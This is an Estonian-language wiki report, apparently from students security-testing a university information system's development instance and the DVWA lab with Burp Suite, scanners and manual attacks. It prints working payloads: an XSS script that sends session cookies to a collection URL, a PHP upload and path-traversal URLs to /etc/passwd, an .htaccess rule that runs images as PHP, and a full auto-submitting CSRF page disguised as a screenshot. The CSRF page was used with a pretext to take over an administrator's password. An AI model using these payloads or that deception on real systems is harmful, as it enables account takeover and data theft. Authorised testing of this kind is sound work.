[[File:Bp2naide.jpg|250px|thumb|right|BurpSuite näidis screenshot UI&#039;st]]&lt;br /&gt;
&lt;br /&gt;
Programm on juba loomult keerulisem. &lt;br /&gt;
&lt;br /&gt;
Burpsuite&#039;iga tuleb panna käima proxy server localhost&#039;is ja brauser määrata kasutama seda proxy serverit aadressil 127.0.0.1:8080.&lt;br /&gt;
&lt;br /&gt;
Kui ligipääs on rünnatavale lehele on olemas, siis teha prooviks üks väär sisselogimine. &lt;br /&gt;
Läbi proxy serveri tuleb BurpSuite&#039;ile kohale vastava veebilehe Header sisselogimise kohta.&lt;br /&gt;
&lt;br /&gt;
Headeris tuleb payloadi positsioonid ära määrata, kuhu see hakkab nimekirja alusel igat sõna panema.&lt;br /&gt;
Payload&#039;i positsioonideks Headeris on username ja password lahtrid ning nendesse jätta ainult 2 paragrahvi tähemärki.&lt;br /&gt;
&lt;br /&gt;
Ründe stiiliks määrata Pitchfork.&lt;br /&gt;
Seejärel mõlema payloadi positioni kohta tuleb ära määrata sõnade listid, mida programm hakkab kasutama.&lt;br /&gt;
&lt;br /&gt;
Optioniste alt tuleb üle kontrollida ka sõnad, mida jälgitakse ebaõnnestunud sisselogimiste korral ja lubaksid järgmisi katseid.&lt;br /&gt;
&lt;br /&gt;
Kui listid sai ära määratud, siis sai panna menüüst käsu Intruder -&amp;gt; Start Attack, mis siis alustas rünnet. &lt;br /&gt;
&lt;br /&gt;
Kahjuks ka see rünne ei toiminud ja ei suudetud parooli välja tuua. &lt;br /&gt;
Proovitud sai ka lühemate nimekirjadega aga edutult. &lt;br /&gt;
&lt;br /&gt;
Peale teise programmi kasutamist jõudsime järeldustele, et Pitchfork meetod kasutab tegelikult meetodit, kus ta paaritab mõlema nimekirja kirja peale järjekorras samadel kohtadel sõnad, millest polnud kasu. Oleks pidanud kasutama ClusterBomb viisi aga meil jäi ajanappuse tõttu kasutamata.&lt;br /&gt;
Samuti Brute Force ründeviisist polnud meil tegelikult kasu ja ei aita eesmärki täita effektiivselt ÕISi arendustestimisel.&lt;br /&gt;
&lt;br /&gt;
Dev-ÕISis on vastavad turvameetmed kasutusele võetud, mis takistab selle tegemist ehk avastamisel keelatakse 5 sekundiks sisselogimine ära vastava teatega. &lt;br /&gt;
&lt;br /&gt;
Lisaks Brute force programmidele ei tule sealt vastavat sõna, mis tähendaks sisselogimise ebaõnnestumist ning annab valepositiivse.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Arendusversioon ÕISist on ära turvatud BruteForce rünnete vastu sisselogimisel.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== CSRF - Cross-site request forgery ===&lt;br /&gt;
&lt;br /&gt;
Loome uue veebilehe, mis saadab aktiivse kasutaja alt käske edasi mõnele veebisaidile, mis usaldab autoriseeritud kasutajat.&lt;br /&gt;
Katse eesmärgiks on DVWA-s kasutaja parooli muutmine. &lt;br /&gt;
&lt;br /&gt;
Rünnatav inimene ise paneb meie tehtud veebilehel on oma praeguse parooli sisse ja Submit nupu vajutamisel saadetakse sealt info koos peidetud väljadega (mis on varustatud uute paroolidega) DVWA parooli muutmise lehele ja tulemuseks on kasutaja muudetud parool.&lt;br /&gt;
&lt;br /&gt;
Lõime uue faili - crosssite.txt&lt;br /&gt;
&lt;br /&gt;
DVWA-s läksime lingile CSRF, kus saab sooritada parooli muutmist.&lt;br /&gt;
&lt;br /&gt;
Võtsime lehe Source Code lahti&lt;br /&gt;
&lt;br /&gt;
Otsisime üles paroolide formi koodi üles ja kopeerisime selle enda veebilehele.&lt;br /&gt;
&lt;br /&gt;
Muutsime ära action väärtuse, DVWA veebilehe omaks, kus muudetakse paroole.&lt;br /&gt;
&lt;br /&gt;
Current Password lahtri jätsime samaks.&lt;br /&gt;
&lt;br /&gt;
Ülejäänud kahe uue passwordi fieldi type&#039;iks määrasime &amp;quot;Hidden&amp;quot; ja value&#039;deks &amp;quot;admin&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
Salvestasime faili ja käivitasime selle.&lt;br /&gt;
&lt;br /&gt;
Tuli ette ainult lahter Current Passwordi ja Submit nupuga.&lt;br /&gt;
&lt;br /&gt;
Panime sisse tolle hetke parooli ning saatsime teele päringu. &lt;br /&gt;
&lt;br /&gt;
Seejärel saimegi DVWAlt vastuseks, et parool muudetud ehk parooliks sai hidden väljades määratud väärtus.&lt;br /&gt;
&lt;br /&gt;
Lõpptulemus: Kasutaja salajane ja ootamatu paroolivahetus sai ära täidetud.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Reflected Cross Site Scripting (XSS)  ===&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Lehel on selline Form:&amp;lt;/li&amp;gt;&lt;br /&gt;
[[Image:Xsstesting.jpg|Location=&amp;quot;left&amp;quot;|Caption|]]&lt;br /&gt;
&amp;lt;br&amp;gt;Form väljastab : Hello „sisestatud nimi“&lt;br /&gt;
&amp;lt;li&amp;gt;Easy puhul:&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Saab sisestada textboxi skripti:&amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    alert(document.cookie.match(/PHPSESSID=[^;\]+/));&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Eelnev skript toob ekraanile lihtsalt hetke sessioni ID.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Kui sellist asja on võimalik sisestada siis saab juba sellise skripti teha mis saadab kasutaja mingile sinu enda leheküljele kuhu on taha lisatud Session ID: &amp;lt;/li&amp;gt;&lt;br /&gt;
    &amp;lt;script&amp;gt;&lt;br /&gt;
    this.document.location.href  = „http://127.0.0.1/varastatud_sess_id/ + document.cookie.match(/PHPSESSID=[^;\]+/);&lt;br /&gt;
    &amp;lt;/script&amp;gt;&lt;br /&gt;
    &amp;lt;li&amp;gt;Saab kohe enda veebiserveri logidest näha  Session ID’d. &lt;br /&gt;
&amp;lt;br&amp;gt;Näide logist:&amp;lt;/li&amp;gt;&lt;br /&gt;
    /var/log/apache2/access.log&lt;br /&gt;
    127.0.0.1 - - [27/Mar/2012:09:06:31 -0400] &amp;quot;GET /varastatud_sess_id/PHPSESSID=51dc79948ee4cd23e6f8160ef2b57945 HTTP/1.1&amp;quot; 404 404 &amp;quot;-&amp;quot;                  &amp;lt;br&amp;gt;  &amp;quot;Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.11) Gecko/20101013 Ubuntu/9.04 (jaunty) Firefox/3.6.11&amp;quot;&lt;br /&gt;
&amp;lt;li&amp;gt;Tuleb ründajal lisada endale uus cookie saabunud Session ID’ga ja peakski olema võimalik teise inimese sessioon üle võtta.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Faili uploadimine DVWA (Damn Vulnerable Web Application) näitel ===&lt;br /&gt;
==== Faili üleslaadimine: madal tase ====&lt;br /&gt;
[[File:DVWA_upload.png|250px|thumb|right|DVWA Upload]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Low -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab suvalisi faile: *.php, *.html, *.jpg, .htaccess&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.php faili saab kirjutada php koodi:&lt;br /&gt;
    &amp;lt;?php var_dump($_REQUEST, $_SERVER); ?&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.php faili asukohta veebilehitsejas http://dvwa/hackable/uploads/*.php käivitatakse skript ja tagastatakse kõik küsitav:&amp;lt;/li&amp;gt;&lt;br /&gt;
  esimeses massiivis &amp;quot;PHPSESSID&amp;quot; (&amp;quot;2b1ae19446cfde009664f18df51b6ec1&amp;quot;) ja turvatase &amp;quot;security&amp;quot; (&amp;quot;low&amp;quot;);&lt;br /&gt;
  teises &amp;quot;HTTP_COOKIE&amp;quot;, milles on eelnevadki andmed; asukoht &amp;quot;PATH&amp;quot;, &amp;quot;SERVER_SOFTWARE&amp;quot;, &amp;quot;SERVER_NAME&amp;quot;,&lt;br /&gt;
    &amp;quot;SERVER_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;SERVER_PORT&amp;quot; (&amp;quot;80&amp;quot;), &amp;quot;REMOTE_ADDR&amp;quot; (&amp;quot;127.42.84.1&amp;quot;), &amp;quot;REMOTE_PORT&amp;quot; (&amp;quot;53425&amp;quot;) jpm.&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: keskmine tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: Medium -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida ei saa näiteks järgnevates formaatides faile:&amp;lt;/li&amp;gt;&lt;br /&gt;
  .htaccess&lt;br /&gt;
  .php	.html	.pdf&lt;br /&gt;
  .gif	.png	.bmp&lt;br /&gt;
  .svg	.swf&lt;br /&gt;
  .tif	.tiff	.exif&lt;br /&gt;
  .raw	.cgm&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks tuleb kasutada &amp;quot;?page=&amp;quot; ja faili asukoht:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../hackable/uploads/*.jpg&lt;br /&gt;
Kuvatakse php skripti tulemus.&lt;br /&gt;
  Kommentaar: &amp;quot;?page=&amp;quot; kasutamine võetud menüüvalikust: &amp;lt;b&amp;gt;File Inclusion&amp;lt;/b&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;quot;?page=&amp;quot; abil saab vaadata kasutajate nimesid:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/passwd&lt;br /&gt;
&amp;lt;li&amp;gt;Paroole vaadata ei saa, selleks õigused puuduvad:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://dvwa/vulnerabilities/fi/?page=../../../../../etc/shadow&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Faili üleslaadimine: kõrge tase ====&lt;br /&gt;
&amp;lt;ul&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;&amp;lt;b&amp;gt;DVWA Security&amp;lt;/b&amp;gt; määrata: High -&amp;gt; Submit&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Valida: Upload&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Üles laadida saab kõiki .jpg-lõpulisi faile (ka *.php.jpg, mitte *.jpg.php)&amp;lt;/li&amp;gt;&lt;br /&gt;
  Üleslaetavasse *.jpg faili saab kirjutada php koodi.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Minnes üleslaetava *.jpg faili asukohta veebilehitsejas, ei käivitata skripti, vaid tagastatakse faili asukoha aadress.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;li&amp;gt;Skripti käivitamiseks ei piisa ka &amp;quot;?page=&amp;quot; kasutamisest. Igal juhul on vastus selline:&amp;lt;/li&amp;gt;&lt;br /&gt;
  ERROR: File not found!&lt;br /&gt;
&amp;lt;li&amp;gt;Kasutada tuleks kuueteistkümnendkoodi, mille saab moodustada näiteks sellel aadressil:&amp;lt;/li&amp;gt;&lt;br /&gt;
  http://www.motobit.com/util/base64-decoder-encoder.asp&lt;br /&gt;
&amp;lt;li&amp;gt;Moodustades loodud faili asukohast kood ja kasutades&amp;lt;/li&amp;gt;&lt;br /&gt;
  data:php/html;base64,aHR0cDovL2R2d2EvaGFja2FibGUvdXBsb2Fkcy91cGxvYWQyLmpwZw==&lt;br /&gt;
üritatakse seda arvutisse salvestada. Salvestamisel .part-nimelise faili, on selle sisuks samuti lihtsalt faili asukoht veebis:&lt;br /&gt;
  http://dvwa/hackable/uploads/*.jpg&lt;br /&gt;
&amp;lt;/ul&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== 3. päev - Dev-ÕIS&#039;i turvatestimine==&lt;br /&gt;
&lt;br /&gt;
=== Acunetix Web Vulnerability Scanner v. 8 ===&lt;br /&gt;
Internetist sai otsitud parimat Windowsi automaatskännerit ja selleks osutus: [[File:Tn Acunetix1.PNG|250px|thumb|right|Seaded]]&lt;br /&gt;
Acunetix Web Vulnerability Scanner v. 8 &lt;br /&gt;
http://www.acunetix.com/vulnerability-scanner/&lt;br /&gt;
&lt;br /&gt;
Pärast programmi installimist tuli seadistada skännimine, valisime keskmise põhjalikkusega skänni.&lt;br /&gt;
&lt;br /&gt;
Erinevalt teistest automaatskännidest sai sellel lihtsamalt seadistatud sisselogimine ja lisaks sai paika panna ka, et ta arvestaks välja Log out lingi.&lt;br /&gt;
&lt;br /&gt;
Antud programm võimaldab skännida:&lt;br /&gt;
:Cross-Site Scripting (XSS)&lt;br /&gt;
:SQL Injection (blind test)&lt;br /&gt;
:File inclusion&lt;br /&gt;
:Code Execution&lt;br /&gt;
:LDAP Injection&lt;br /&gt;
:Cross Frame Scripting&lt;br /&gt;
:SQL Injection (error msg. test)&lt;br /&gt;
:CRLF Injection&lt;br /&gt;
:Directory Travelsal&lt;br /&gt;
:XPath Injection&lt;br /&gt;
:URL Redirection&lt;br /&gt;
:Application Error Message&lt;br /&gt;
&lt;br /&gt;
Kuna skänner skännib väga põhjalikult ja teskeskonnal ei töötanud täsvõimsusel oli ping väga suur sai pärast 19h skännimist, kui oli tehtud ~9% skännimisest see peatada.&lt;br /&gt;
19h skännimise tulemus oli:&lt;br /&gt;
25 High alerts:[[File:Tn Acunetix.PNG|250px|thumb|right|XSS skänni tulemus]]&lt;br /&gt;
HTTP Parameter Pollution (24)&lt;br /&gt;
Weak Password (1)&lt;br /&gt;
&lt;br /&gt;
251 Medium alerts:&lt;br /&gt;
Apache hhtpd Remote denial of service (2)&lt;br /&gt;
Application error message (244)&lt;br /&gt;
URL redirection (5)&lt;br /&gt;
&lt;br /&gt;
6 Low alerts:&lt;br /&gt;
Apache mod_negotiation filename bruteforcing (2)&lt;br /&gt;
Login page password-guessing attack (1)&lt;br /&gt;
Sensitive page could be cached (3)&lt;br /&gt;
&lt;br /&gt;
21 Informational alerts:&lt;br /&gt;
Broken links (18)&lt;br /&gt;
Password type input with autcomplete enabled (3)&lt;br /&gt;
&lt;br /&gt;
Kuna esimest skänni ei saanud lõpule viia otsustasime teha ühe kategooria skänni.&lt;br /&gt;
Skänniks sai valitud Cross-Site Scripting (XSS)&lt;br /&gt;
See skänn kestis 3h ja selle jooksul saadeti 61461 reqesti&lt;br /&gt;
Skänn tuvastas 742 high alerti (Cross Site Scripting) ja 21 informational alerti[Broken link(18), Password type input with autocomplete enabled (3)].&lt;br /&gt;
&lt;br /&gt;
Kuna tegu on automaatiseeritud programmiga ei tähenda, et sait tegelt nii ebaturvaline on, osad asjad mida programm nõrkuseks loeb on mingi põhjusega lihtsalt nii seatud.&lt;br /&gt;
Skänni tulemuste kohta on raske mingeid kindlaid järeldus teha, kuna igat viga tuleks analüüsida ja määrata ära reaalne oht saidile.&lt;br /&gt;
Märkida võiks ära, et iga veebilehe omanik, kes on mures turvalisuse pärast võiks kaaluda selle toote kasutamist.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Failure to Restrict URL Access ===&lt;br /&gt;
[[File:PDFHinneteleht.png|250px|thumb|right|Näide hinnetelehest]]&lt;br /&gt;
Kui testisime failide uploadimis võimalusi tuli idee testida ka failide allalaadimist.&amp;lt;br&amp;gt;&lt;br /&gt;
Faile saab alla laadida enda profiili all õppesooritustes.&amp;lt;br&amp;gt;&lt;br /&gt;
Seal on võimalik alla laadida nii .pdf kui ka .odt formaadis õppesooritusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Allalaadimis Urli muutmisega oli võimalik alla laadida teiste kasutajate õpitulemusi.&amp;lt;br&amp;gt;&lt;br /&gt;
Õpitulemused sisaldasid lisaks tulemustele ka inimese isikukoodi.&amp;lt;br&amp;gt;&lt;br /&gt;
Kui oleks soovinud õpitulemusi alla laadida kindla kasutaja õpitulemusi oleks saanud õpilase id kätte tema profiili pildi id kaudu.&amp;lt;br&amp;gt;&lt;br /&gt;
Kuna see oli tõsine turvaauk ja õpilaste andmed on konfidentsiaalsed lisati sellele lingile url accessi nii, et enam üks õpilane teise inimese andmetele ligi ei pääseks.&amp;lt;br&amp;gt;&lt;br /&gt;
Proovisime ligi saada ka teistes kohtades lehtedele, mille õigus polnud, aga kõik olid kaitstud url&#039;id.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Subgraph Vega ===&lt;br /&gt;
Subgraph Vega on beeta staadiumis olev vabavaraline veebiapplikatsioni nõrkuste skänner, proxy ja platvorm.&lt;br /&gt;
Selle tööriistaga annab välja otsida SQL injectionit võimaldavad kohad, Cross-Site-Scriptingut, URL injection jne võimaldavaid nõrkusi veebilehel.&lt;br /&gt;
Programm on Java põhine graafilise liidesega ja töötab Linux&#039;i, OS X ja Windowsi peal.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega1.png|250px|thumb|right|Subgraph Vega screenshot]]&lt;br /&gt;
Päeva alguses sai hakatud katsetama seda ÕISi arenduskeskkonna peal.&lt;br /&gt;
&lt;br /&gt;
Alustasime uut skänni (Start New Scan).&lt;br /&gt;
Küsitakse URI, milleks andsime https://itcollege.dev.ois.ee ja Next.&lt;br /&gt;
&lt;br /&gt;
Järgnevalt on vaja anda kätte sisselogitud kasutaja cookie ja vajadusel lisada kindlate linkide välistamise regullaar avaldised. &lt;br /&gt;
&lt;br /&gt;
Me lisasime ainult küpsise (cookie) sisu: &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
itcollege_OIS_SESSION_ID=sellecookiesisu1234563221&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
ning Finish.&lt;br /&gt;
&lt;br /&gt;
[[File:Screenshot_vega2.png|250px|thumb|right|Subgraph Vega screenshot ühe leitud nõrkusega]]&lt;br /&gt;
Järgnevalt ta hakkab skännima ette antud veebilehte ja kui küpsise info ning aadress on õige, siis ta suudab sisselogimisest mööda saada ilusti ja saab uurima hakata, kus võimalikud vead võivad olla. Tegutsemine võttis suhteliselt kaua aega (u. 30minutit).&lt;br /&gt;
&lt;br /&gt;
Katkestasime skännimise ära, kui ta oli umbes 15000 objektist ära skänninud umbes 12000. &lt;br /&gt;
&lt;br /&gt;
Selleks ajaks oli Vega leidnud kõrgema tasemega Cross Site Script&#039;ingu nõrkusi 58, keskmise tasemega Absolute Path nõrkusi 2, ja lihtsalt informatsiooniks 6 tühja element Body  nõrkust.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Uurides leitud Cross Site Scriptingu leitud nõrkusi, saime aru, et tegu on selliste aadressitega, milles veebilehed kasutavad aadressirealt saadud ID&#039;sid ja parameetreid ära oma pealkirjades.&lt;br /&gt;
Õnneks parameetritega väljad olid veebilehel korralikult ära escape&#039;itud ja saniteeritud, et suhteliselt võimatu oli saada mõnda scripti sinna sisse panna, et veebileht midagi teistmoodi teeks.&lt;br /&gt;
&lt;br /&gt;
ID väljade osas aga ei olnud kaitstud üks link, mille avastas Alo ennem mind.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Wapiti ===&lt;br /&gt;
Proovisime ära ka Backtrack 5 R2 tööriista Wapiti. &lt;br /&gt;
(Koduleht: http://wapiti.sourceforge.net/)&lt;br /&gt;
&lt;br /&gt;
Kahjuks ei saanud seda tööriista kasutada dev-ÕISi pihta, kuna see tööriist ei osanud kasutada HTTPS protokolli kasutada. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== CSRF käsitsi rünne HTML/PHP/JAVASCRIPTiga===&lt;br /&gt;
====1. katse - ÕISi keskkkonna keelevahetus =====&lt;br /&gt;
[[File:Keeleseaded.png|thumb|250px|right|ÕISi keeleseadete menüü]]&lt;br /&gt;
&lt;br /&gt;
Päeva esimeses pooles sai avastatud, et dev-ÕISi kasutaja keskkonna keelt saab muuta, kui mõnelt väliselt veebilehelt saata vastav POST päring lingile, mis muudab keelte seadistust.&lt;br /&gt;
&lt;br /&gt;
Võtsime dev-ÕIS&#039;i Source Code&#039;ist välja vastava formi osa ja panime eraldi html faili.&lt;br /&gt;
Koristasime mittevajaliku disaini koodi juurest ära.&lt;br /&gt;
Muutsime form&#039;i action väärtust pannes olemasoleva ette https://itcollege.dev.ois.ee/ osa ehk oleks absoluutne aadress relatiivse asemel.&lt;br /&gt;
Teises fieldis, kus oli vaja määrata keele tähistus, mida saadetaks, panime väärtuseks &amp;quot;en&amp;quot; ehk inglise keelne keskkond tekiks.&lt;br /&gt;
Panime koodi enose veebiserverisse üles nimega ois.html.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;form id=&amp;quot;settingsForm&amp;quot; method=&amp;quot;post&amp;quot; action=&amp;quot;https://itcollege.dev.ois.ee/setting/edit?user_id=2198&amp;quot; &lt;br /&gt;
enctype=&amp;quot;application/x-www-form-urlencoded&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;input type=&amp;quot;hidden&amp;quot; AUTOCOMPLETE=&amp;quot;off&amp;quot; name=&amp;quot;default_language&amp;quot;value=&amp;quot;en&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;br&amp;gt;&lt;br /&gt;
  &amp;lt;input type=&amp;quot;submit&amp;quot; value=&amp;quot;Salvesta seaded&amp;quot; name=&amp;quot;Savesettings&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;/form&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
Panime faili enda arvutis käima, tekkis vastav form ette, kus submit pannes päring jõudis õisi ja muudeti kogeselt ära keskkonna kasutaja keel.&lt;br /&gt;
&lt;br /&gt;
Katsetas koodi enda konto peal Taavi.&lt;br /&gt;
&lt;br /&gt;
====2. katse - ÕIS&#039;i kasutaja parooli muutmine ====&lt;br /&gt;
&lt;br /&gt;
[[File:Salasona_ois.PNG|250px|thumb|right|Dev_OIS salasõna muutmisvorm]]&lt;br /&gt;
Otsustasime proovida, kas CSRF nõrkust annaks ära kasutada ka ÕISi administraatori pettes, kui saata talle pildi link, kus tegelikult taga jookseb HTML/JAVASCRIPT koos, mis saadab POST päringu salasõna muutmisega. Selle toimiseks oli eelduseks see, et rünnatav on ründamise hetkel juba dev-ÕISi sisselogitud.&lt;br /&gt;
&lt;br /&gt;
Selle jaoks uurisime välja, kus asub dev-ÕIS&#039;i kasutaja salasõna muutmise vorm ja kuhu saadetakse vormi sisu.&lt;br /&gt;
Vormilt võtsime lähtekoodist (Source Code) vastava koodi välja ja panime eraldi php faili.&lt;br /&gt;
&lt;br /&gt;
Muutsime password ja password_check lahtrite väärtused järgnevaks: &amp;quot;test123&amp;quot; ehk kasutaja uus parool peale rünnakut.&lt;br /&gt;
&lt;br /&gt;
Lahtrites muutsime user_id&#039;d sisaldavad väärtused rünnatava kasutaja user_id vastu, mille saab kätte tudengite/vilistlaste/õppejõudude piltide aadressidelt kätte.&lt;br /&gt;
&lt;br /&gt;
Kõik vormi lahtrite tüübid määrasime peidetud ehk &amp;quot;hidden&amp;quot;, et poleks midagi näidata. &lt;br /&gt;
&lt;br /&gt;
Kuna parooli muutmise formil on küljes ka continue parameeter, mis näitab seda, kuhu kasutaja viiakse peale parooli muutmist. &lt;br /&gt;
Selle muutsime väljalogimise lingiks, et peale POST päringu tegemist suunatakse kasutaja väljalogimise lehele.&lt;br /&gt;
Sellisel juhul ei tule ette teadet, et parooli just muudeti kuskil ja kasutaja enam ei saa oma vana parooliga sisse logida.&lt;br /&gt;
&lt;br /&gt;
Lisasime CSS koodi Submit nupu ära peitmiseks. &lt;br /&gt;
JavaScript koodi, et kui leht on laetud, siis automaatselt vajutataks seda nähtamatut Submit nuppu, et brauser saadaks HTML POST päringu ÕISi poole teele.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Salvestasime faili ära kui &amp;quot;screen1.jpg&amp;quot; fail. Ohver arvab, et tegu on pildiga, kui saadame lingi ja seda veel usaldusväärse aadressi pealt.&lt;br /&gt;
Tegelikult kasutaja ei näe praegu ühtegi pilti ja suunatakse edasi.&lt;br /&gt;
&lt;br /&gt;
Faili sisu:&lt;br /&gt;
&amp;lt;source lang=&amp;quot;html4strict&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
 &amp;lt;head&amp;gt;&lt;br /&gt;
  &amp;lt;style type=&amp;quot;text/css&amp;quot;&amp;gt;&lt;br /&gt;
	  #Setpassword{ width: 0px; height: 0px; border: none; padding: 0; margin: 0; }&lt;br /&gt;
  &amp;lt;/style&amp;gt;&lt;br /&gt;
 &amp;lt;/head&amp;gt;&lt;br /&gt;
 &amp;lt;body&amp;gt;&lt;br /&gt;
  &amp;lt;body onload=&amp;quot;document.forms.setPasswordForm.submit();&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;form name=&amp;quot;setPasswordForm&amp;quot; id=&amp;quot;setPasswordForm&amp;quot; &lt;br /&gt;
  action=&amp;quot;https://itcollegedev.ois.ee/et/user/set-own-password?user_id=2227&amp;amp;amp;continue=/auth/logout&amp;quot;  &lt;br /&gt;
  method=&amp;quot;post&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;user_id&amp;quot; value=&amp;quot;2227&amp;quot; id=&amp;quot;user_id&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;continue&amp;quot; value=&amp;quot;%2Fet%2Fsetting%3Fuser_id%3D2227&amp;quot; id=&amp;quot;continue&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password&amp;quot; id=&amp;quot;password&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;hidden&amp;quot; name=&amp;quot;password_check&amp;quot; id=&amp;quot;password_check&amp;quot; value=&amp;quot;test123&amp;quot; /&amp;gt;&lt;br /&gt;
   &amp;lt;input type=&amp;quot;submit&amp;quot; name=&amp;quot;Setpassword&amp;quot; id=&amp;quot;Setpassword&amp;quot; value=&amp;quot;Muuda salasõna&amp;quot; /&amp;gt;&lt;br /&gt;
  &amp;lt;/form&amp;gt;&lt;br /&gt;
 &amp;lt;/body&amp;gt;&lt;br /&gt;
&amp;lt;/html&amp;gt;&lt;br /&gt;
&amp;lt;/source&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:Admin_proof.PNG|250px|thumb|right|Ligisaadud adminpaneelile]]&lt;br /&gt;
&lt;br /&gt;
Tegime uue faili htaccess.txt, kuhu panime kirja käsu, mis käivitaks php ja jpg faile kui php failidena.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
AddType application/x-httpd-php .php .jpg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Laadisime mõlemad failid Enose veebiserverisse avalikult. &lt;br /&gt;
&lt;br /&gt;
Tegime enda kontode peal katsed, et kõik toimiks nii nagu vaja ja ega probleeme ei teki. &lt;br /&gt;
Peale seda juhendaja Mart Manguse abiga saime ÕISi adminnile Valter Kunglale väikese test-rünnaku teha.&lt;br /&gt;
Mart Mangus üritas seletada, et hinnetelehel on midagi viga ja palus, et Valter vaataks asja üle. &lt;br /&gt;
Sellega saavutasime selle, et Valter logis dev-ÕISi sisse oma kontoga.&lt;br /&gt;
Valter ütles, et ta ei näe midagi viltu ja selle peale saatsime talle nii nimetatud screenshoti, mille taga oli tegelt meie koodiga screen1.jpg fail. &lt;br /&gt;
Kui see fail käivitati, siis Valter Kungla parool muudeti ära ja logiti süsteemist välja. &lt;br /&gt;
Tol hetkel, täpselt ennem väljalogimist ja ümbersuunamist, muutus tema parool meie pantud &amp;quot;test123&amp;quot;-ks ja me saime ligipääsu administraatori õigustes kontole. &lt;br /&gt;
